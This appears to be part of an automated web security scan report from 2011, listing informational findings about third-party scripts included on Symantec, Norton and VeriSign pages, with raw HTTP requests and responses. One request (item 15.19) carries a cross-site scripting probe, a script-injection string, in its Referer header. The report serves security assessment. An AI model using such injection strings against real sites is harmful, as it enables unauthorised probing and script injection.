<meta name="om.user_id" content="" />

<script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=de&ct=de&sg=norton&url=/norton/familyresources/index.jsp&domain=www.symantec.com&analytics=n"></"></script>
<link rel="shortcut icon" href="http://www.symantec.com/favicon.ico" type="image/x-icon" />

<script type="text/javascript" src="http://nortonde.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
<!-- START OMNITURE JAVASCRIPT INCLUDES -->
<script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"></script>
<script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"></script>
...[SNIP]...
<!-- END SITECATALYST CODE VERSION: H.15.1. -->

   
       <script type="text/javascript" src="http://nortonde.i.lithium.com/t5/scripts/1D71204D9D9658792FA0096B2FB2A913/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://nortonde.i.lithium.com/t5/scripts/FE6BBBDB381DA2F6F1B96A6E926BAF19/lia-scripts-body-min.js"></script>
...[SNIP]...

15.6. http://free.pctools.com/free-antivirus/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://free.pctools.com
Path:   /free-antivirus/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /free-antivirus/ HTTP/1.1
Host: free.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.4
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 09 Sep 2011 21:42:00 GMT
Date: Fri, 09 Sep 2011 21:42:00 GMT
Content-Length: 17565
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <title>Free AntiVirus & An
...[SNIP]...
</div>
       <script src="http://twitter.com/javascripts/blogger.js" type="text/javascript"><!--mce:0--></script>
       <script src="http://twitter.com/statuses/user_timeline/pctools.json?callback=twitterCallback2&amp;count=1" type="text/javascript"><!--mce:1-->
...[SNIP]...

15.7. http://investor.symantec.com/phoenix.zhtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investor.symantec.com
Path:   /phoenix.zhtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /phoenix.zhtml?c=89422&p=irol-irhomeNews HTTP/1.1
Host: investor.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=58
Date: Fri, 09 Sep 2011 21:42:06 GMT
Content-Length: 39751
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><!--###PHBoeHBhZ2U+PHRpbWVTdGFtcD45LzkvMjAxMSA1OjQyOjA2IFBNPC90aW1lU3RhbXA+PHRpbWVUaWxsQ0NCTlJlZnJlc2g+NjA8L3RpbWVUaWxsQ0NCTlJlZnJl
...[SNIP]...
<link rel="stylesheet" type="text/css" href="client/89/89422/css/ccbnIR.css" /><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script><script src="http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2" type="text/javascript"></script>
...[SNIP]...
</div><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

15.8. https://knowledge.verisign.ch/support/code-signing-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/code-signing-support/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"
               type="text/javascript">
</script>
...[SNIP]...

15.9. https://knowledge.verisign.ch/support/digital-id-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/digital-id-support/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/digital-id-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"
               type="text/javascript">
</script>
...[SNIP]...

15.10. https://knowledge.verisign.ch/support/mpki-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/mpki-support/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/mpki-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"
               type="text/javascript">
</script>
...[SNIP]...

15.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/ssl-certificates-support/index

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"
               type="text/javascript">
</script>
...[SNIP]...

15.12. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/ssl-certificates-support/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"
               type="text/javascript">
</script>
...[SNIP]...

15.13. https://knowledge.verisign.ch/support/trust-seal-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/trust-seal-support/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/trust-seal-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"
               type="text/javascript">
</script>
...[SNIP]...

15.14. http://query.verisign.ch/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://query.verisign.ch
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search HTTP/1.1
Host: query.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:19 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
Content-Length: 43489
Connection: close


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html><head>
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http
...[SNIP]...
</script>

       <script type="text/javascript" src="//cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"></script>
...[SNIP]...
<div id="header_seal">
                       <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=query.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...
</div>

       <script type="text/javascript" src="//cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"></script>

       <script type="text/javascript" src="//cdn.verisign.com/authweb/global/assets/shared/js/shared.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//cdn.verisign.com/assets/shared/js/curvycorners.js"></script>
...[SNIP]...

15.15. https://securitycenter.verisign.com/celp/enroll/outsideSearch

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitycenter.verisign.com
Path:   /celp/enroll/outsideSearch

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP HTTP/1.1
Host: securitycenter.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:46:33 GMT
Content-type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=OqJ5OZYQ2WaOK1XBACbZvE969n6D9cN3GA67zeaCICg9DN3y5YkW!-1800460983; path=/
Connection: close


<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8"/>
<title>


   Search for SSL or Code Signing Certificates from VeriSig
...[SNIP]...
<body aLink=#000000 bgColor=#ffffff class=bgWht leftMargin=0 link=#000000 topMargin=0 vLink=#000000 marginheight="0" marginwidth="0" onLoad="focus()">


<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

15.16. https://ssl-certificate-center.verisign.ch/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.ch
Path:   /process/retail/console_login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
</script><script type="text/javascript" src="https://www.verisign.com/js/mbox.js" language="JavaScript"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...

15.17. https://ssl-certificate-center.verisign.com/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/console_login

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:43 GMT
Server: Apache
Set-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
</script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...

15.18. http://store.symantec.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.symantec.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?inid=us_pagenotfound_smb_store HTTP/1.1
Host: store.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 09 Sep 2011 21:30:57 GMT
Content-Length: 18197


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<!--
...[SNIP]...
<!-- Microsoft CDN Script References -->
<script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.5.min.js" type="text/javascript"></script>
<script src="http://ajax.aspnetcdn.com/ajax/jquery.validate/1.7/jquery.validate.min.js"
type="text/javascript">
</script>
...[SNIP]...
<!-- Microsoft CDN Script References -->
<script src="http://ajax.aspnetcdn.com/ajax/jquery.ui/1.8.9/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...

15.19. https://symantec-corporation.com/servlet/campaignrespondent

Summary

Severity:   Information
Confidence:   Certain
Host:   https://symantec-corporation.com
Path:   /servlet/campaignrespondent

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004 HTTP/1.1
Host: symantec-corporation.com
Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:30 GMT
P3P: policyref="http://policy.responsys.net/w3c/response.xml", CP="NON DSP COR IVAi IVDi OTRi IND ONL"
Pragma: no-cache
Cache-Control: no-cache, private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 36800

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Symantec Enterprise Sales Contact Center</title>
<meta content="veritasnonconsumer" name="om.environment"
...[SNIP]...
<link rel="stylesheet" href="https://www-secure.symantec.com/css/20081218/business.css" /><script src="https://www-secure.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"></script>
...[SNIP]...
</script><script src="https://www-secure.symantec.com/specprog/onlineopinionS3t/oo_engine.js" language="javascript" type="text/javascript"></script><script src="https://www-secure.symantec.com/script/20080114/swfobject.js" language="javascript" type="text/javascript"></script><script src="https://www-secure.symantec.com/lib/jsp/headerutilsjs.jsp?lg=en&ct=us&sg=business&domain=&secure=" language="javascript" type="text/javascript"></script>
...[SNIP]...
<!-- i2a tracking code--><script type="text/javascript"
src="https://www-secure.symantec.com/scripts/icrossing/i2a.js">

</script>
...[SNIP]...
</p>
<script src="https://www-secure.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"></script>
...[SNIP]...

15.20. https://trust-center.verisign.ch/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.ch
Path:   /process/retail/console_login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
</script><script type="text/javascript" src="https://www.verisign.com/js/mbox.js" language="JavaScript"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...

15.21. https://trust-center.verisign.com/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/console_login

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:48 GMT
Server: Apache
Set-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
</script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...

15.22. https://trust-center.verisign.com/process/retail/help_and_support

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/help_and_support

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /process/retail/help_and_support HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:53 GMT
Server: Apache
Set-Cookie: TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 138732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
</script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...

15.23. https://trust-center.verisign.com/process/retail/trust_product_selector

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_product_selector

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 41019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...
</script>
<script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...

15.24. http://us.norton.com/360

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /360

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /360 HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=679
Date: Fri, 09 Sep 2011 21:47:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107429

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Firewall - Anti Virus - Phishing Protection | Norton 360</title>
<meta http-
...[SNIP]...
</script>
                   <script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript">
</script>
...[SNIP]...

15.25. http://us.norton.com/downloads/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /downloads/index.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /downloads/index.jsp HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=3256
Date: Fri, 09 Sep 2011 21:47:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53856

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Download Norton Internet Security, Antivirus or Norton 360</title>
<meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

15.26. http://us.norton.com/familyresources/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /familyresources/index.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /familyresources/index.jsp HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=64
Date: Fri, 09 Sep 2011 21:47:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67586

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Family Resource Center: Internet Safety for Children, Teens &amp;amp; Adults
...[SNIP]...
</div>


<script src="http://www.symantec.com/script/20070727/windowShade.js" language="javascript" type="text/javascript"></script>
...[SNIP]...

15.27. http://us.norton.com/nortonlive/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /nortonlive/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /nortonlive/ HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=utf-8
Cache-Control: public, max-age=3479
Date: Fri, 09 Sep 2011 21:47:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39789

